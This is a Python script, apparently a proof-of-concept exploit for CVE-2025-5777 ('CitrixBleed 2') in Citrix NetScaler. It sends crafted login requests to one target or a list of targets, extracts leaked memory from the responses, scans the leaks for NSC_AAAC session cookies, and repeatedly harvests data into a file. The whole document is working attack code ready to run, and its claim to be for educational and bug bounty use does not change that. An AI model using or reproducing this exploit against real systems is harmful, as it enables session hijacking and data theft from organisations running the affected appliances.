#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Title: Advanced Citrix NetScaler Memory Leak Exploit CVE: CVE-2025-5777 Severity: Critical Tool Author: CyberTechAjju Purpose: For educational and bug bounty purposes ONLY. Description: This script analyzes and exploits the CVE-2025-5777 memory leak vulnerability in Citrix NetScaler. It not only fetches the leak but also processes it to extract human-readable strings and identify sensitive patterns, maximizing the ability to demonstrate impact. """ import sys import asyncio import aiohttp import signal import argparse import re from colorama import init, Fore, Style from datetime import datetime # --- Configuration --- init(autoreset=True) OUTPUT_FILE = "leaks.txt" SENSITIVE_PATTERNS = { "SESSION_COOKIE": re.compile(r'NSC_AAAC=([a-f0-9]{64})') } # --- Global State --- stop_flag = asyncio.Event() seen_leaks = set() def display_banner(): """Prints a stylish banner for the tool.""" banner = r""" ██████╗ ██╗ ██╗███████╗████████╗██████╗ ███████╗██████╗ ██╔══██╗╚██╗ ██╔╝██╔════╝╚══██╔══╝██╔══██╗██╔════╝██╔══██╗ ██████╔╝ ╚████╔╝ █████╗ ██║ ██████╔╝█████╗ ██████╔╝ ██╔══██╗ ╚██╔╝ ██╔══╝ ██║ ██╔══██╗██╔══╝ ██╔══██╗ ██████╔╝ ██║ ███████╗ ██║ ██║ ██║███████╗██████╔╝ ╚═════╝ ╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚═════╝ """ print(Fore.CYAN + Style.BRIGHT + banner) print(Fore.YELLOW + Style.BRIGHT + " Ultimate PoC for CVE-2025-5777 (CitrixBleed 2)") print(f"{Fore.RED} Severity: Critical") print(f"{Fore.WHITE} Author: CyberTechAjju") print("-" * 60) def signal_handler(sig, frame): """Handles Ctrl+C to stop gracefully.""" if not stop_flag.is_set(): print(f"\n{Fore.YELLOW}[+] Stopping gracefully...") stop_flag.set() def extract_printable_strings(data_bytes, min_len=4): """Extracts human-readable strings from raw binary data.""" strings = [] current_string = "" printable_chars = set(bytes(range(32, 127))) # ASCII printable characters for byte in data_bytes: if byte in printable_chars: current_string += chr(byte) else: if len(current_string) >= min_len: strings.append(current_string) current_string = "" if len(current_string) >= min_len: strings.append(current_string) return strings def hex_dump(data_bytes): """Prints a hex dump of the given bytes.""" for i in range(0, len(data_bytes), 16): chunk = data_bytes[i:i+16] hex_str = ' '.join(f'{b:02x}' for b in chunk) ascii_str = ''.join((chr(b) if 32 <= b <= 126 else '.') for b in chunk) print(f' {i:08x}: {hex_str:<48} {ascii_str}') def save_and_display_leak(url, raw_leak_bytes): """Analyzes, displays, and saves the leak data.""" leak_hash = hash(raw_leak_bytes) if leak_hash in seen_leaks: return seen_leaks.add(leak_hash) print(f"\n{Fore.GREEN}{Style.BRIGHT}[+] LEAK DETECTED from {url} ({len(raw_leak_bytes)} bytes)!") # --- Analyze and Display --- leak_str = raw_leak_bytes.decode('utf-8', 'replace') cleaned_strings = extract_printable_strings(raw_leak_bytes) # 1. Check for sensitive patterns findings = {} for key, pattern in SENSITIVE_PATTERNS.items(): match = pattern.search(leak_str) if match: findings[key] = match.group(1) print(f"{Fore.RED}{Style.BRIGHT} [!!!] HIGH IMPACT FIND: Found {key} -> {findings[key]}") # 2. Display cleaned strings print(f"{Fore.CYAN}\n --- HUMAN-READABLE STRINGS (CLEANED) ---") if cleaned_strings: for s in cleaned_strings: print(f" {s}") else: print(" No significant text strings found.") # 3. Display hex dump print(f"{Fore.WHITE}\n --- HEX DUMP ---") hex_dump(raw_leak_bytes) print("-" * 60) # --- Save to File --- with open(OUTPUT_FILE, "a", encoding="utf-8", errors="replace") as f: timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S") f.write("="*80 + "\n") f.write(f"[{timestamp}] Leak from target: {url}\n") if findings: f.write("\n[!!!] SENSITIVE DATA FOUND [!!!]\n") for key, val in findings.items(): f.write(f" - {key}: {val}\n") if cleaned_strings: f.write("\n--- HUMAN-READABLE STRINGS ---\n") f.write('\n'.join(cleaned_strings)) f.write("\n" + "="*80 + "\n\n") async def fetch(session, url, args): """Sends a request and processes the response.""" full_url = f"{url}/p/u/doAuthentication.do" try: async with session.post(full_url, data="login", proxy=args.proxy, ssl=False) as response: if response.status == 200: content_bytes = await response.read() match = re.search(rb"(.*?)", content_bytes, re.DOTALL) if match and match.group(1).strip(): save_and_display_leak(url, match.group(1)) return True # Leak found except Exception as e: if args.verbose: print(f"{Fore.RED}[!] Error for {url}: {e}") return False async def exploit(args): """Main asynchronous function to run the exploit.""" connector = aiohttp.TCPConnector(limit=args.threads) timeout = aiohttp.ClientTimeout(total=15) targets = [] if args.url: targets.append(args.url.rstrip('/')) elif args.list: try: with open(args.list, 'r') as f: targets = [line.strip() for line in f if line.strip()] except FileNotFoundError: print(f"{Fore.RED}[!] Error: Target list file '{args.list}' not found.") return async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session: for url in targets: if stop_flag.is_set(): break print(f"{Fore.BLUE}[*] Testing target: {url}") leak_found = await fetch(session, url, args) if args.check: if leak_found: print(f"{Fore.GREEN}[+] Target appears VULNERABLE.") else: print(f"{Fore.YELLOW}[-] Target does not appear vulnerable.") continue if leak_found: print(f"{Fore.GREEN}[+] Vulnerability confirmed. Starting continuous extraction... (Press Ctrl+C to stop)") while not stop_flag.is_set(): await asyncio.gather(*(fetch(session, url, args) for _ in range(args.threads))) await asyncio.sleep(1) else: print(f"{Fore.YELLOW}[-] No leak detected in initial check. Target likely not vulnerable.") print(f"\n{Fore.GREEN}Scan complete. All findings saved to '{OUTPUT_FILE}'.") if __name__ == "__main__": display_banner() parser = argparse.ArgumentParser(description="Advanced PoC for CVE-2025-5777") group = parser.add_mutually_exclusive_group(required=True) group.add_argument("-u", "--url", help="Single target base URL (e.g., https://citrix.example.com)") group.add_argument("-l", "--list", help="File containing a list of target URLs") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose error output") parser.add_argument("-p", "--proxy", help="HTTP proxy URL (e.g., http://127.0.0.1:8080)") parser.add_argument("-t", "--threads", type=int, default=10, help="Number of concurrent requests (default: 10)") parser.add_argument("--check", action="store_true", help="Only check for vulnerability once, do not loop") args = parser.parse_args() signal.signal(signal.SIGINT, signal_handler) try: asyncio.run(exploit(args)) except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[+] Program interrupted by user.")